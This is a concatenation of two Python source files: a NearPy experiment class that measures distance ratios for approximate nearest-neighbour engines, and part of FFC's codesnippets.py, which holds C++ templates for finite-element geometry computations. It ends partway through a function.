# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from __future__ import print_function
import numpy
import scipy
import time
import sys
from scipy.spatial.distance import cdist
from nearpy.utils import numpy_array_from_list_or_numpy_array
class DistanceRatioExperiment(object):
"""
Performs nearest neighbour experiments with custom vector data
for all engines in the specified list.
Distance ratio is the average distance of retrieved approximated
neighbours, that are outside the radius of the real nearest N
neighbours, with respect to this radius.
Let R be the radius of the real N nearest neighbours around the
query vector. Then a distance ratio of 1.0 means, that the average
approximated nearest neighbour is 2*R away from the query point.
A distance_ratio of 0.0 means, all approximated neighbours are
within the radius.
This is a much better performance measure for ANN than recall or precision,
because in ANN we are interested in spatial relations between query vector
and the results.
perform_experiment() returns list of (distance_ratio, result_size,
search_time) tuple. These are the averaged values over all request
vectors. search_time is the average retrieval/search time compared
to the average exact search time. result_size is the size of the
retrieved set of approximated neighbours.
coverage_ratio determines how many of the vectors are used as query
vectors for exact andapproximated search. Because the search comparance
overhead is quite large, it is best with large data sets (>10000) to
use a low coverage_ratio (like 0.1) to make the experiment fast. A
coverage_ratio of 0.1 makes the experiment use 10% of all the vectors
for querying, that is, it looks for 10% of all vectors for the nearest
neighbours.
"""
def __init__(self, N, vectors, coverage_ratio=0.2):
"""
Performs exact nearest neighbour search on the data set.
vectors can either be a numpy matrix with all the vectors
as columns OR a python array containing the individual
numpy vectors.
"""
# We need a dict from vector string representation to index
self.vector_dict = {}
self.N = N
self.coverage_ratio = coverage_ratio
# Get numpy array representation of input
self.vectors = numpy_array_from_list_or_numpy_array(vectors)
# Build map from vector string representation to vector
for index in range(self.vectors.shape[1]):
self.vector_dict[self.__vector_to_string(
self.vectors[:, index])] = index
# Get transposed version of vector matrix, so that the rows
# are the vectors (needed by cdist)
vectors_t = numpy.transpose(self.vectors)
# Determine the indices of query vectors used for comparance
# with approximated search.
query_count = numpy.floor(self.coverage_ratio *
self.vectors.shape[1])
self.query_indices = []
for k in range(int(query_count)):
index = numpy.floor(k*(self.vectors.shape[1]/query_count))
index = min(index, self.vectors.shape[1]-1)
self.query_indices.append(int(index))
print('\nStarting exact search (query set size=%d)...\n' % query_count)
# For each query vector get radius of closest N neighbours
self.nearest_radius = {}
self.exact_search_time_per_vector = 0.0
for index in self.query_indices:
v = vectors_t[index, :].reshape(1, self.vectors.shape[0])
exact_search_start_time = time.time()
D = cdist(v, vectors_t, 'euclidean')
# Get radius of closest N neighbours
self.nearest_radius[index] = scipy.sort(D)[0, N]
# Save time needed for exact search
exact_search_time = time.time() - exact_search_start_time
self.exact_search_time_per_vector += exact_search_time
print('\Done with exact search...\n')
# Normalize search time
self.exact_search_time_per_vector /= float(len(self.query_indices))
def perform_experiment(self, engine_list):
"""
Performs nearest neighbour experiments with custom vector data
for all engines in the specified list.
Returns self.result contains list of (distance_ratio, search_time)
tuple. All are the averaged values over all request vectors.
search_time is the average retrieval/search time compared to the
average exact search time.
"""
# We will fill this array with measures for all the engines.
result = []
# For each engine, first index vectors and then retrieve neighbours
for engine in engine_list:
print('Engine %d / %d' % (engine_list.index(engine),
len(engine_list)))
# Clean storage
engine.clean_all_buckets()
# Use this to compute average distance_ratio
avg_distance_ratio = 0.0
# Use this to compute average result set size
avg_result_size = 0.0
# Use this to compute average search time
avg_search_time = 0.0
# Index all vectors and store them
for index in range(self.vectors.shape[1]):
engine.store_vector(self.vectors[:, index],
'data_%d' % index)
# Look for N nearest neighbours for query vectors
for index in self.query_indices:
# We have to time the search
search_time_start = time.time()
# Get nearest N according to engine
nearest = engine.neighbours(self.vectors[:, index])
# Get search time
search_time = time.time() - search_time_start
# Get average distance ratio (with respect to radius
# of real N closest neighbours)
distance_ratio = 0.0
for n in nearest:
# If the vector is outside the real neighbour radius
if n[2] > self.nearest_radius[index]:
# Compute distance to real neighbour radius
d = (n[2] - self.nearest_radius[index])
# And normalize it. 1.0 means: distance to
# real neighbour radius is identical to radius
d /= self.nearest_radius[index]
# If all neighbours are in the radius, the
# distance ratio is 0.0
distance_ratio += d
# Normalize distance ratio over all neighbours
distance_ratio /= len(nearest)
# Add to accumulator
avg_distance_ratio += distance_ratio
# Add to accumulator
avg_result_size += len(nearest)
# Add to accumulator
avg_search_time += search_time
# Normalize distance ratio over query set
avg_distance_ratio /= float(len(self.query_indices))
# Normalize avg result size
avg_result_size /= float(len(self.query_indices))
# Normalize search time over query set
avg_search_time = avg_search_time / float(len(self.query_indices))
# Normalize search time with respect to exact search
avg_search_time /= self.exact_search_time_per_vector
print(' distance_ratio=%f, result_size=%f, time=%f' % (avg_distance_ratio,
avg_result_size,
avg_search_time))
result.append((avg_distance_ratio, avg_result_size, avg_search_time))
return result
def __vector_to_string(self, vector):
""" Returns string representation of vector. """
return numpy.array_str(vector)
def __index_of_vector(self, vector):
""" Returns index of specified vector from test data set. """
return self.vector_dict[self.__vector_to_string(vector)] | PypiClean |
/FFC-2017.1.0.tar.gz/FFC-2017.1.0/ffc/codesnippets.py |
# Copyright (C) 2007-2016 Anders Logg
#
# This file is part of FFC.
#
# FFC is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# FFC is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with FFC. If not, see <http://www.gnu.org/licenses/>.
#
# Modified by Kristian B. Oelgaard 2010-2013
# Modified by Marie Rognes 2007-2012
# Modified by Peter Brune 2009
# Modified by Martin Sandve Alnæs, 2013
#
# First added: 2007-02-28
# Last changed: 2014-06-10
"Code snippets for code generation."
__all__ = ["comment_ufc", "comment_dolfin", "header_h", "header_c", "footer",
"compute_jacobian", "compute_jacobian_inverse",
"eval_basis_decl", "eval_basis_init", "eval_basis", "eval_basis_copy",
"eval_derivs_decl", "eval_derivs_init", "eval_derivs", "eval_derivs_copy"]
__old__ = ["evaluate_f",
"facet_determinant", "map_onto_physical",
"fiat_coordinate_map", "transform_snippet",
"scale_factor", "combinations_snippet",
"normal_direction",
"facet_normal", "ip_coordinates", "cell_volume", "circumradius",
"facet_area", "min_facet_edge_length", "max_facet_edge_length",
"orientation_snippet"]
__all__ += __old__
comment_ufc = """\
// This code conforms with the UFC specification version %(ufc_version)s
// and was automatically generated by FFC version %(ffc_version)s.
"""
comment_dolfin = """\
// This code conforms with the UFC specification version %(ufc_version)s
// and was automatically generated by FFC version %(ffc_version)s.
//
// This code was generated with the option '-l dolfin' and
// contains DOLFIN-specific wrappers that depend on DOLFIN.
"""
# Code snippets for headers and footers
header_h = """\
#ifndef __%(prefix_upper)s_H
#define __%(prefix_upper)s_H
"""
header_c = """\
#include "%(prefix)s.h"
"""
footer = """\
#endif
"""
# Code snippets for computing Jacobians
_compute_jacobian_interval_1d = """\
// Compute Jacobian
double J%(restriction)s[1];
compute_jacobian_interval_1d(J%(restriction)s, coordinate_dofs%(restriction)s);
"""
_compute_jacobian_interval_2d = """\
// Compute Jacobian
double J%(restriction)s[2];
compute_jacobian_interval_2d(J%(restriction)s, coordinate_dofs%(restriction)s);
"""
_compute_jacobian_interval_3d = """\
// Compute Jacobian
double J%(restriction)s[3];
compute_jacobian_interval_3d(J%(restriction)s, coordinate_dofs%(restriction)s);
"""
_compute_jacobian_triangle_2d = """\
// Compute Jacobian
double J%(restriction)s[4];
compute_jacobian_triangle_2d(J%(restriction)s, coordinate_dofs%(restriction)s);
"""
_compute_jacobian_triangle_3d = """\
// Compute Jacobian
double J%(restriction)s[6];
compute_jacobian_triangle_3d(J%(restriction)s, coordinate_dofs%(restriction)s);
"""
_compute_jacobian_tetrahedron_3d = """\
// Compute Jacobian
double J%(restriction)s[9];
compute_jacobian_tetrahedron_3d(J%(restriction)s, coordinate_dofs%(restriction)s);
"""
compute_jacobian = {1: {1: _compute_jacobian_interval_1d,
2: _compute_jacobian_interval_2d,
3: _compute_jacobian_interval_3d},
2: {2: _compute_jacobian_triangle_2d,
3: _compute_jacobian_triangle_3d},
3: {3: _compute_jacobian_tetrahedron_3d}}
# Code snippets for computing Jacobian inverses
_compute_jacobian_inverse_interval_1d = """\
// Compute Jacobian inverse and determinant
double K%(restriction)s[1];
double detJ%(restriction)s;
compute_jacobian_inverse_interval_1d(K%(restriction)s, detJ%(restriction)s, J%(restriction)s);
"""
_compute_jacobian_inverse_interval_2d = """\
// Compute Jacobian inverse and determinant
double K%(restriction)s[2];
double detJ%(restriction)s;
compute_jacobian_inverse_interval_2d(K%(restriction)s, detJ%(restriction)s, J%(restriction)s);
"""
_compute_jacobian_inverse_interval_3d = """\
// Compute Jacobian inverse and determinant
double K%(restriction)s[3];
double detJ%(restriction)s;
compute_jacobian_inverse_interval_3d(K%(restriction)s, detJ%(restriction)s, J%(restriction)s);
"""
_compute_jacobian_inverse_triangle_2d = """\
// Compute Jacobian inverse and determinant
double K%(restriction)s[4];
double detJ%(restriction)s;
compute_jacobian_inverse_triangle_2d(K%(restriction)s, detJ%(restriction)s, J%(restriction)s);
"""
_compute_jacobian_inverse_triangle_3d = """\
// Compute Jacobian inverse and determinant
double K%(restriction)s[6];
double detJ%(restriction)s;
compute_jacobian_inverse_triangle_3d(K%(restriction)s, detJ%(restriction)s, J%(restriction)s);
"""
_compute_jacobian_inverse_tetrahedron_3d = """\
// Compute Jacobian inverse and determinant
double K%(restriction)s[9];
double detJ%(restriction)s;
compute_jacobian_inverse_tetrahedron_3d(K%(restriction)s, detJ%(restriction)s, J%(restriction)s);
"""
compute_jacobian_inverse = {1: {1: _compute_jacobian_inverse_interval_1d,
2: _compute_jacobian_inverse_interval_2d,
3: _compute_jacobian_inverse_interval_3d},
2: {2: _compute_jacobian_inverse_triangle_2d,
3: _compute_jacobian_inverse_triangle_3d},
3: {3: _compute_jacobian_inverse_tetrahedron_3d}}
# Code snippet for scale factor
scale_factor = """\
// Set scale factor
const double det = std::abs(detJ);"""
# FIXME: Old stuff below that should be cleaned up or moved to ufc_geometry.h
orientation_snippet = """
// Check orientation
if (cell_orientation%(restriction)s == -1)
throw std::runtime_error("cell orientation must be defined (not -1)");
// (If cell_orientation == 1 = down, multiply det(J) by -1)
else if (cell_orientation%(restriction)s == 1)
detJ%(restriction)s *= -1;
"""
evaluate_f = "f.evaluate(vals, y, c);"
_facet_determinant_1D = """\
// Facet determinant 1D (vertex)
const double det = 1.0;"""
_facet_determinant_2D = """\
// Get vertices on edge
static unsigned int edge_vertices[3][2] = {{1, 2}, {0, 2}, {0, 1}};
const unsigned int v0 = edge_vertices[facet%(restriction)s][0];
const unsigned int v1 = edge_vertices[facet%(restriction)s][1];
// Compute scale factor (length of edge scaled by length of reference interval)
const double dx0 = coordinate_dofs%(restriction)s[2*v1 + 0] - coordinate_dofs%(restriction)s[2*v0 + 0];
const double dx1 = coordinate_dofs%(restriction)s[2*v1 + 1] - coordinate_dofs%(restriction)s[2*v0 + 1];
const double det = std::sqrt(dx0*dx0 + dx1*dx1);
"""
_facet_determinant_2D_1D = """\
// Facet determinant 1D in 2D (vertex)
const double det = 1.0;
"""
_facet_determinant_3D = """\
// Get vertices on face
static unsigned int face_vertices[4][3] = {{1, 2, 3}, {0, 2, 3}, {0, 1, 3}, {0, 1, 2}};
const unsigned int v0 = face_vertices[facet%(restriction)s][0];
const unsigned int v1 = face_vertices[facet%(restriction)s][1];
const unsigned int v2 = face_vertices[facet%(restriction)s][2];
// Compute scale factor (area of face scaled by area of reference triangle)
const double a0 = (coordinate_dofs%(restriction)s[3*v0 + 1]*coordinate_dofs%(restriction)s[3*v1 + 2] + coordinate_dofs%(restriction)s[3*v0 + 2]*coordinate_dofs%(restriction)s[3*v2 + 1] + coordinate_dofs%(restriction)s[3*v1 + 1]*coordinate_dofs%(restriction)s[3*v2 + 2]) - (coordinate_dofs%(restriction)s[3*v2 + 1]*coordinate_dofs%(restriction)s[3*v1 + 2] + coordinate_dofs%(restriction)s[3*v2 + 2]*coordinate_dofs%(restriction)s[3*v0 + 1] + coordinate_dofs%(restriction)s[3*v1 + 1]*coordinate_dofs%(restriction)s[3*v0 + 2]);
const double a1 = (coordinate_dofs%(restriction)s[3*v0 + 2]*coordinate_dofs%(restriction)s[3*v1 + 0] + coordinate_dofs%(restriction)s[3*v0 + 0]*coordinate_dofs%(restriction)s[3*v2 + 2] + coordinate_dofs%(restriction)s[3*v1 + 2]*coordinate_dofs%(restriction)s[3*v2 + 0]) - (coordinate_dofs%(restriction)s[3*v2 + 2]*coordinate_dofs%(restriction)s[3*v1 + 0] + coordinate_dofs%(restriction)s[3*v2 + 0]*coordinate_dofs%(restriction)s[3*v0 + 2] + coordinate_dofs%(restriction)s[3*v1 + 2]*coordinate_dofs%(restriction)s[3*v0 + 0]);
const double a2 = (coordinate_dofs%(restriction)s[3*v0 + 0]*coordinate_dofs%(restriction)s[3*v1 + 1] + coordinate_dofs%(restriction)s[3*v0 + 1]*coordinate_dofs%(restriction)s[3*v2 + 0] + coordinate_dofs%(restriction)s[3*v1 + 0]*coordinate_dofs%(restriction)s[3*v2 + 1]) - (coordinate_dofs%(restriction)s[3*v2 + 0]*coordinate_dofs%(restriction)s[3*v1 + 1] + coordinate_dofs%(restriction)s[3*v2 + 1]*coordinate_dofs%(restriction)s[3*v0 + 0] + coordinate_dofs%(restriction)s[3*v1 + 0]*coordinate_dofs%(restriction)s[3*v0 + 1]);
const double det = std::sqrt(a0*a0 + a1*a1 + a2*a2);
"""
_facet_determinant_3D_2D = """\
// Facet determinant 2D in 3D (edge)
// Get vertices on edge
static unsigned int edge_vertices[3][2] = {{1, 2}, {0, 2}, {0, 1}};
const unsigned int v0 = edge_vertices[facet%(restriction)s][0];
const unsigned int v1 = edge_vertices[facet%(restriction)s][1];
// Compute scale factor (length of edge scaled by length of reference interval)
const double dx0 = coordinate_dofs%(restriction)s[3*v1 + 0] - coordinate_dofs%(restriction)s[3*v0 + 0];
const double dx1 = coordinate_dofs%(restriction)s[3*v1 + 1] - coordinate_dofs%(restriction)s[3*v0 + 1];
const double dx2 = coordinate_dofs%(restriction)s[3*v1 + 2] - coordinate_dofs%(restriction)s[3*v0 + 2];
const double det = std::sqrt(dx0*dx0 + dx1*dx1 + dx2*dx2);
"""
_facet_determinant_3D_1D = """\
// Facet determinant 1D in 3D (vertex)
const double det = 1.0;
"""
_normal_direction_1D = """\
const bool direction = facet%(restriction)s == 0 ? coordinate_dofs%(restriction)s[0] > coordinate_dofs%(restriction)s[1] : coordinate_dofs%(restriction)s[1] > coordinate_dofs%(restriction)s[0];
"""
_normal_direction_2D = """\
const bool direction = dx1*(coordinate_dofs%(restriction)s[2*%(facet)s] - coordinate_dofs%(restriction)s[2*v0]) - dx0*(coordinate_dofs%(restriction)s[2*%(facet)s + 1] - coordinate_dofs%(restriction)s[2*v0 + 1]) < 0;
"""
_normal_direction_3D = """\
const bool direction = a0*(coordinate_dofs%(restriction)s[3*%(facet)s] - coordinate_dofs%(restriction)s[3*v0]) + a1*(coordinate_dofs%(restriction)s[3*%(facet)s + 1] - coordinate_dofs%(restriction)s[3*v0 + 1]) + a2*(coordinate_dofs%(restriction)s[3*%(facet)s + 2] - coordinate_dofs%(restriction)s[3*v0 + 2]) < 0;
"""
# MER: Coding all up in _facet_normal_ND_M_D for now; these are
# therefore empty.
_normal_direction_2D_1D = ""
_normal_direction_3D_2D = ""
_normal_direction_3D_1D = ""
_facet_normal_1D = """
// Facet normals are 1.0 or -1.0: (-1.0) <-- X------X --> (1.0)
const double n%(restriction)s = %(direction)sdirection ? 1.0 : -1.0;"""
_facet_normal_2D = """\
// Compute facet normals from the facet scale factor constants
const double n%(restriction)s0 = %(direction)sdirection ? dx1 / det : -dx1 / det;
const double n%(restriction)s1 = %(direction)sdirection ? -dx0 / det : dx0 / det;"""
_facet_normal_2D_1D = """
// Compute facet normal
double n%(restriction)s0 = 0.0;
double n%(restriction)s1 = 0.0;
if (facet%(restriction)s == 0)
{
n%(restriction)s0 = coordinate_dofs%(restriction)s[0] - coordinate_dofs%(restriction)s[2];
n%(restriction)s1 = coordinate_dofs%(restriction)s[1] - coordinate_dofs%(restriction)s[3];
}
else
{
n%(restriction)s0 = coordinate_dofs%(restriction)s[2] - coordinate_dofs%(restriction)s[0];
n%(restriction)s1 = coordinate_dofs%(restriction)s[3] - coordinate_dofs%(restriction)s[1];
}
const double n%(restriction)s_length = std::sqrt(n%(restriction)s0*n%(restriction)s0 + n%(restriction)s1*n%(restriction)s1);
n%(restriction)s0 /= n%(restriction)s_length;
n%(restriction)s1 /= n%(restriction)s_length;
"""
_facet_normal_3D = """
const double n%(restriction)s0 = %(direction)sdirection ? a0 / det : -a0 / det;
const double n%(restriction)s1 = %(direction)sdirection ? a1 / det : -a1 / det;
const double n%(restriction)s2 = %(direction)sdirection ? a2 / det : -a2 / det;"""
_facet_normal_3D_2D = """
// Compute facet normal for triangles in 3D
const unsigned int vertex%(restriction)s0 = facet%(restriction)s;
// Get coordinates corresponding the vertex opposite this
// static unsigned int edge_vertices[3][2] = {{1, 2}, {0, 2}, {0, 1}};
const unsigned int vertex%(restriction)s1 = edge_vertices[facet%(restriction)s][0];
const unsigned int vertex%(restriction)s2 = edge_vertices[facet%(restriction)s][1];
// Define vectors n = (p2 - p0) and t = normalized (p2 - p1)
double n%(restriction)s0 = coordinate_dofs%(restriction)s[3*vertex%(restriction)s2 + 0] - coordinate_dofs%(restriction)s[3*vertex%(restriction)s0 + 0];
double n%(restriction)s1 = coordinate_dofs%(restriction)s[3*vertex%(restriction)s2 + 1] - coordinate_dofs%(restriction)s[3*vertex%(restriction)s0 + 1];
double n%(restriction)s2 = coordinate_dofs%(restriction)s[3*vertex%(restriction)s2 + 2] - coordinate_dofs%(restriction)s[3*vertex%(restriction)s0 + 2];
double t%(restriction)s0 = coordinate_dofs%(restriction)s[3*vertex%(restriction)s2 + 0] - coordinate_dofs%(restriction)s[3*vertex%(restriction)s1 + 0];
double t%(restriction)s1 = coordinate_dofs%(restriction)s[3*vertex%(restriction)s2 + 1] - coordinate_dofs%(restriction)s[3*vertex%(restriction)s1 + 1];
double t%(restriction)s2 = coordinate_dofs%(restriction)s[3*vertex%(restriction)s2 + 2] - coordinate_dofs%(restriction)s[3*vertex%(restriction)s1 + 2];
const double t%(restriction)s_length = std::sqrt(t%(restriction)s0*t%(restriction)s0 + t%(restriction)s1*t%(restriction)s1 + t%(restriction)s2*t%(restriction)s2);
t%(restriction)s0 /= t%(restriction)s_length;
t%(restriction)s1 /= t%(restriction)s_length;
t%(restriction)s2 /= t%(restriction)s_length;
// Subtract, the projection of (p2 - p0) onto (p2 - p1), from (p2 - p0)
const double ndott%(restriction)s = t%(restriction)s0*n%(restriction)s0 + t%(restriction)s1*n%(restriction)s1 + t%(restriction)s2*n%(restriction)s2;
n%(restriction)s0 -= ndott%(restriction)s*t%(restriction)s0;
n%(restriction)s1 -= ndott%(restriction)s*t%(restriction)s1;
n%(restriction)s2 -= ndott%(restriction)s*t%(restriction)s2;
const double n%(restriction)s_length = std::sqrt(n%(restriction)s0*n%(restriction)s0 + n%(restriction)s1*n%(restriction)s1 + n%(restriction)s2*n%(restriction)s2);
// Normalize
n%(restriction)s0 /= n%(restriction)s_length;
n%(restriction)s1 /= n%(restriction)s_length;
n%(restriction)s2 /= n%(restriction)s_length;
"""
_facet_normal_3D_1D = """
// Compute facet normal
double n%(restriction)s0 = 0.0;
double n%(restriction)s1 = 0.0;
double n%(restriction)s2 = 0.0;
if (facet%(restriction)s == 0)
{
n%(restriction)s0 = coordinate_dofs%(restriction)s[0] - coordinate_dofs%(restriction)s[3];
n%(restriction)s1 = coordinate_dofs%(restriction)s[1] - coordinate_dofs%(restriction)s[4];
n%(restriction)s1 = coordinate_dofs%(restriction)s[2] - coordinate_dofs%(restriction)s[5];
}
else
{
n%(restriction)s0 = coordinate_dofs%(restriction)s[3] - coordinate_dofs%(restriction)s[0];
n%(restriction)s1 = coordinate_dofs%(restriction)s[4] - coordinate_dofs%(restriction)s[1];
n%(restriction)s1 = coordinate_dofs%(restriction)s[5] - coordinate_dofs%(restriction)s[2];
}
const double n%(restriction)s_length = std::sqrt(n%(restriction)s0*n%(restriction)s0 + n%(restriction)s1*n%(restriction)s1 + n%(restriction)s2*n%(restriction)s2);
n%(restriction)s0 /= n%(restriction)s_length;
n%(restriction)s1 /= n%(restriction)s_length;
n%(restriction)s2 /= n%(restriction)s_length;
"""
_cell_volume_1D = """\
// Compute cell volume
const double volume%(restriction)s = std::abs(detJ%(restriction)s);
"""
_cell_volume_2D = """\
// Compute cell volume
const double volume%(restriction)s = std::abs(detJ%(restriction)s)/2.0;
"""
_cell_volume_2D_1D = """\
// Compute cell volume of interval in 2D
const double volume%(restriction)s = std::abs(detJ%(restriction)s);
"""
_cell_volume_3D = """\
// Compute cell volume
const double volume%(restriction)s = std::abs(detJ%(restriction)s)/6.0;
"""
_cell_volume_3D_1D = """\
// Compute cell volume of interval in 3D
const double volume%(restriction)s = std::abs(detJ%(restriction)s);
"""
_cell_volume_3D_2D = """\
// Compute cell volume of triangle in 3D
const double volume%(restriction)s = std::abs(detJ%(restriction)s)/2.0;
"""
_circumradius_1D = """\
// Compute circumradius; in 1D it is equal to half the cell length
const double circumradius%(restriction)s = std::abs(detJ%(restriction)s)/2.0;
"""
_circumradius_2D = """\
// Compute circumradius of triangle in 2D
const double v1v2%(restriction)s = std::sqrt((coordinate_dofs%(restriction)s[4] - coordinate_dofs%(restriction)s[2])*(coordinate_dofs%(restriction)s[4] - coordinate_dofs%(restriction)s[2]) + (coordinate_dofs%(restriction)s[5] - coordinate_dofs%(restriction)s[3])*(coordinate_dofs%(restriction)s[5] - coordinate_dofs%(restriction)s[3]) );
const double v0v2%(restriction)s = std::sqrt(J%(restriction)s[3]*J%(restriction)s[3] + J%(restriction)s[1]*J%(restriction)s[1]);
const double v0v1%(restriction)s = std::sqrt(J%(restriction)s[0]*J%(restriction)s[0] + J%(restriction)s[2]*J%(restriction)s[2]);
const double circumradius%(restriction)s = 0.25*(v1v2%(restriction)s*v0v2%(restriction)s*v0v1%(restriction)s)/(volume%(restriction)s);
"""
_circumradius_2D_1D = """\
// Compute circumradius of interval in 3D (1/2 volume)
const double circumradius%(restriction)s = std::abs(detJ%(restriction)s)/2.0;
"""
_circumradius_3D = """\
// Compute circumradius
const double v1v2%(restriction)s = std::sqrt( (coordinate_dofs%(restriction)s[6] - coordinate_dofs%(restriction)s[3])*(coordinate_dofs%(restriction)s[6] - coordinate_dofs%(restriction)s[3]) + (coordinate_dofs%(restriction)s[7] - coordinate_dofs%(restriction)s[4])*(coordinate_dofs%(restriction)s[7] - coordinate_dofs%(restriction)s[4]) + (coordinate_dofs%(restriction)s[8] - coordinate_dofs%(restriction)s[5])*(coordinate_dofs%(restriction)s[8] - coordinate_dofs%(restriction)s[5]) );
const double v0v2%(restriction)s = std::sqrt(J%(restriction)s[1]*J%(restriction)s[1] + J%(restriction)s[4]*J%(restriction)s[4] + J%(restriction)s[7]*J%(restriction)s[7]);
const double v0v1%(restriction)s = std::sqrt(J%(restriction)s[0]*J%(restriction)s[0] + J%(restriction)s[3]*J%(restriction)s[3] + J%(restriction)s[6]*J%(restriction)s[6]);
const double v0v3%(restriction)s = std::sqrt(J%(restriction)s[2]*J%(restriction)s[2] + J%(restriction)s[5]*J%(restriction)s[5] + J%(restriction)s[8]*J%(restriction)s[8]);
const double v1v3%(restriction)s = std::sqrt( (coordinate_dofs%(restriction)s[9] - coordinate_dofs%(restriction)s[3])*(coordinate_dofs%(restriction)s[9] - coordinate_dofs%(restriction)s[3]) + (coordinate_dofs%(restriction)s[10] - coordinate_dofs%(restriction)s[4])*(coordinate_dofs%(restriction)s[10] - coordinate_dofs%(restriction)s[4]) + (coordinate_dofs%(restriction)s[11] - coordinate_dofs%(restriction)s[5])*(coordinate_dofs%(restriction)s[11] - coordinate_dofs%(restriction)s[5]) );
const double v2v3%(restriction)s = std::sqrt( (coordinate_dofs%(restriction)s[9] - coordinate_dofs%(restriction)s[6])*(coordinate_dofs%(restriction)s[9] - coordinate_dofs%(restriction)s[6]) + (coordinate_dofs%(restriction)s[10] - coordinate_dofs%(restriction)s[7])*(coordinate_dofs%(restriction)s[10] - coordinate_dofs%(restriction)s[7]) + (coordinate_dofs%(restriction)s[11] - coordinate_dofs%(restriction)s[8])*(coordinate_dofs%(restriction)s[11] - coordinate_dofs%(restriction)s[8]) );
const double la%(restriction)s = v1v2%(restriction)s*v0v3%(restriction)s;
const double lb%(restriction)s = v0v2%(restriction)s*v1v3%(restriction)s;
const double lc%(restriction)s = v0v1%(restriction)s*v2v3%(restriction)s;
const double s%(restriction)s = 0.5*(la%(restriction)s+lb%(restriction)s+lc%(restriction)s);
const double area%(restriction)s = std::sqrt(s%(restriction)s*(s%(restriction)s-la%(restriction)s)*(s%(restriction)s-lb%(restriction)s)*(s%(restriction)s-lc%(restriction)s));
const double circumradius%(restriction)s = area%(restriction)s / ( 6.0*volume%(restriction)s );
"""
_circumradius_3D_1D = """\
// Compute circumradius of interval in 3D (1/2 volume)
const double circumradius%(restriction)s = std::abs(detJ%(restriction)s)/2.0;
"""
_circumradius_3D_2D = """\
// Compute circumradius of triangle in 3D
const double v1v2%(restriction)s = std::sqrt( (coordinate_dofs%(restriction)s[6] - coordinate_dofs%(restriction)s[3])*(coordinate_dofs%(restriction)s[6] - coordinate_dofs%(restriction)s[3]) + (coordinate_dofs%(restriction)s[7] - coordinate_dofs%(restriction)s[4])*(coordinate_dofs%(restriction)s[7] - coordinate_dofs%(restriction)s[4]) + (coordinate_dofs%(restriction)s[8] - coordinate_dofs%(restriction)s[5])*(coordinate_dofs%(restriction)s[8] - coordinate_dofs%(restriction)s[5]));
const double v0v2%(restriction)s = std::sqrt( J%(restriction)s[3]*J%(restriction)s[3] + J%(restriction)s[1]*J%(restriction)s[1] + J%(restriction)s[5]*J%(restriction)s[5]);
const double v0v1%(restriction)s = std::sqrt( J%(restriction)s[0]*J%(restriction)s[0] + J%(restriction)s[2]*J%(restriction)s[2] + J%(restriction)s[4]*J%(restriction)s[4]);
const double circumradius%(restriction)s = 0.25*(v1v2%(restriction)s*v0v2%(restriction)s*v0v1%(restriction)s)/(volume%(restriction)s);
"""
_facet_area_1D = """\
// Facet area (FIXME: Should this be 0.0?)
const double facet_area = 1.0;"""
_facet_area_2D = """\
// Facet area
const double facet_area = det;"""
_facet_area_2D_1D = """\
// Facet area
const double facet_area = 1.0;"""
_facet_area_3D = """\
// Facet area (divide by two because 'det' is scaled by area of reference triangle)
const double facet_area = det/2.0;"""
_facet_area_3D_1D = """\
// Facet area
const double facet_area = 1.0;"""
_facet_area_3D_2D = """\
// Facet area
const double facet_area = det;"""
evaluate_basis_dofmap = """\
unsigned int element = 0;
unsigned int tmp = 0;
for (unsigned int j = 0; j < %d; j++)
{
if (tmp + dofs_per_element[j] > i)
{
i -= tmp;
element = element_types[j];
break;
}
else
tmp += dofs_per_element[j];
}"""
_min_facet_edge_length_3D = """\
// Min edge length of facet
double min_facet_edge_length;
compute_min_facet_edge_length_tetrahedron_3d(min_facet_edge_length, facet%(restriction)s, coordinate_dofs%(restriction)s);
"""
_max_facet_edge_length_3D = """\
// Max edge length of facet
double max_facet_edge_length;
compute_max_facet_edge_length_tetrahedron_3d(max_facet_edge_length, facet%(restriction)s, coordinate_dofs%(restriction)s);
"""
# FIXME: This is dead slow because of all the new calls
# Used in evaluate_basis_derivatives. For second order derivatives in 2D it will
# generate the combinations: [(0, 0), (0, 1), (1, 0), (1, 1)] (i.e., xx, xy, yx, yy)
# which will also be the ordering of derivatives in the return value.
combinations_snippet = """\
// Declare two dimensional array that holds combinations of derivatives and initialise
unsigned int %(combinations)s[%(max_num_derivatives)s][%(max_degree)s];
for (unsigned int row = 0; row < %(max_num_derivatives)s; row++)
{
for (unsigned int col = 0; col < %(max_degree)s; col++)
%(combinations)s[row][col] = 0;
}
// Generate combinations of derivatives
for (unsigned int row = 1; row < %(num_derivatives)s; row++)
{
for (unsigned int num = 0; num < row; num++)
{
for (unsigned int col = %(n)s-1; col+1 > 0; col--)
{
if (%(combinations)s[row][col] + 1 > %(dimension-1)s)
%(combinations)s[row][col] = 0;
else
{
%(combinations)s[row][col] += 1;
break;
}
}
}
}"""
def _transform_snippet(tdim, gdim):
if tdim == gdim:
_t = ""
_g = ""
else:
_t = "_t"
_g = "_g"
# Matricize K_ij -> {K_ij}
matrix = "{{" + "}, {".join([", ".join(["K[%d]" % (t * gdim + g)
for g in range(gdim)])
for t in range(tdim)]) + "}};\n\n"
snippet = """\
// Compute inverse of Jacobian
const double %%(K)s[%d][%d] = %s""" % (tdim, gdim, matrix)
snippet += """// Declare transformation matrix
// Declare pointer to two dimensional array and initialise
double %%(transform)s[%%(max_g_deriv)s][%%(max_t_deriv)s];
for (unsigned int j = 0; j < %%(num_derivatives)s%(g)s; j++)
{
for (unsigned int k = 0; k < %%(num_derivatives)s%(t)s; k++)
%%(transform)s[j][k] = 1;
}
// Construct transformation matrix
for (unsigned int row = 0; row < %%(num_derivatives)s%(g)s; row++)
{
for (unsigned int col = 0; col < %%(num_derivatives)s%(t)s; col++)
{
for (unsigned int k = 0; k < %%(n)s; k++)
